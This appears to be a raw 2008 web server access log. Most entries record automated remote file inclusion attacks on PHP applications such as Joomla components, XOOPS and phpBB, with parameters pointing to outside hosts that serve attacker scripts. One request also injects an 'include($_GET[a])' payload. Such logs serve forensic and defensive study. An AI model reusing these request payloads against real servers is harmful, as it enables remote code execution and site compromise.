203.22.204.188 - - [17/Apr/2008:16:12:35 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.19.144.26 - - [17/Apr/2008:16:13:23 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
83.19.144.26 - - [17/Apr/2008:16:13:24 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.84.155.122 - - [17/Apr/2008:16:14:25 -0700] "GET /logs/access.log//excelwriter/http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.255.121.113 - - [17/Apr/2008:16:14:55 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET /logs/access_080211.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET /logs/access_080211.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET //content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET //content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET /logs//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:15:56 -0700] "GET /logs//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.155.122 - - [17/Apr/2008:16:16:21 -0700] "GET /logs/access.log//excelwriter/http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:16:16:53 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:16:16:53 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:55 -0700] "GET /logs/access_080211.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:56 -0700] "GET /logs/access_080312.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:56 -0700] "GET /logs/access_080312.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:56 -0700] "GET /logs/access_080211.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:58 -0700] "GET //index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:58 -0700] "GET //index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:58 -0700] "GET /logs//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:16:58 -0700] "GET /logs//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:17:15 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:17:15 -0700] "GET /modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.149.161.171 - - [17/Apr/2008:16:17:24 -0700] "GET /logsaccess.log HTTP/1.0" 404 275 "-" "Wget/1.5.3.1" "dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:30 -0700] "GET /logs/access_080211.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:30 -0700] "GET /logs/access_080211.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:31 -0700] "GET //content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:31 -0700] "GET //content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:31 -0700] "GET /logs//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:31 -0700] "GET /logs//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:55 -0700] "GET /logs/access_080211.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:57 -0700] "GET //index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:57 -0700] "GET /logs//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:17:59 -0700] "GET /logs/access_080211.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:18:01 -0700] "GET //index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 5001 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:18:01 -0700] "GET /logs//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:18:01 -0700] "GET /logs/access_080312.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.241.218 - - [17/Apr/2008:16:18:01 -0700] "GET /logs/access_080312.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:18:33 -0700] "GET /logs/access_080312.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:18:37 -0700] "GET /logs/access_080312.log//content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:18:51 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:18:52 -0700] "GET //ashnews.php?pathtoashnews=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:18:52 -0700] "GET /logs//ashnews.php?pathtoashnews=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:18:59 -0700] "GET /logs/access_080312.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.6.199.225 - - [17/Apr/2008:16:19:01 -0700] "GET /logs/access_080312.log//index.php//mambots/content/joomla.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:16:19:28 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:16:19:28 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
88.84.155.122 - - [17/Apr/2008:16:20:26 -0700] "GET /logs/access.log//excelwriter/http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:16:20:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.47.247.136 - - [17/Apr/2008:16:21:05 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://au.ex.ac.uk/~sailing/images/stories/jpg.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.165.148.225 - - [17/Apr/2008:16:25:11 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
82.165.148.225 - - [17/Apr/2008:16:25:12 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:16:25:49 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:16:25:50 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:26:29 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:26:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:26:29 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:16:28:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
80.40.126.41 - - [17/Apr/2008:16:28:18 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 200 4139 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.122.29.81 - - [17/Apr/2008:16:28:35 -0700] "GET /logs/access_071212.log HTTP/1.1" 200 89527 "http://www.hello.com.mx/search/modules-cjaycontent-admin-editor2-spaw_control.class.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:29:21 -0700] "GET /logs/access_080315.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:29:21 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:29:21 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:29:56 -0700] "GET /logs/access_080302.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [17/Apr/2008:16:29:58 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.e-sempione.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:30:12 -0700] "GET /logs/access_080315.log//atom.php5?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:30:13 -0700] "GET //atom.php5?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:30:13 -0700] "GET /logs//atom.php5?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.36.66.13 - - [17/Apr/2008:16:30:28 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.139.12.162 - - [17/Apr/2008:16:31:42 -0700] "GET /presto/ HTTP/1.1" 200 526 "http://home.earthlink.net/~infernofilecabinet2/XpSetupsF_J/JourneyPII_Setup.htm" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
24.139.12.162 - - [17/Apr/2008:16:31:43 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:31:52 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:31:52 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:31:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:31:53 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.37.115 - - [17/Apr/2008:16:31:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.37.115 - - [17/Apr/2008:16:31:56 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 1121402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:32:33 -0700] "GET /logs/access_080302.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:16:32:33 -0700] "GET /logs/access_080302.log/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:16:33:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:16:33:50 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:36:38 -0700] "GET /logs/access_080329.log//ashnews.php?pathtoashnews=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:37:24 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:37:24 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:37:25 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:16:38:09 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:16:38:09 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [17/Apr/2008:16:38:09 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:16:38:53 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:16:38:53 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.253.200 - - [17/Apr/2008:16:38:53 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.96.27.5 - - [17/Apr/2008:16:39:48 -0700] "GET /logs/access_080218.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://lineagezone.no-ip.org/je/sp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:41:23 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
71.7.196.132 - - [17/Apr/2008:16:41:50 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.7.196.132 - - [17/Apr/2008:16:41:51 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.7.196.132 - - [17/Apr/2008:16:41:51 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.232.28 - - [17/Apr/2008:16:42:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.232.28 - - [17/Apr/2008:16:42:08 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:42:14 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:42:15 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:42:15 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:42:59 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:42:59 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:16:43:00 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://chrystylcoiffure.com/id15.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.30.78.171 - - [17/Apr/2008:16:43:53 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://lamers.za.pl/s/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.90.83 - - [17/Apr/2008:16:44:49 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.systel.ru/phpbb2//language/lang_german/list.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.29.90.83 - - [17/Apr/2008:16:44:51 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.systel.ru/phpbb2//language/lang_german/list.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:06 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:07 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:13 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:58 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:58 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:45:58 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [17/Apr/2008:16:46:12 -0700] "GET /logs/access_080324.log//atom.php5?page=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.128.80.14 - - [17/Apr/2008:16:46:17 -0700] "GET /logs/access_080302.log//admin/business_inc/saveserver.php?thisdir=http://www.nameserver11.net/billing2/include/html/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
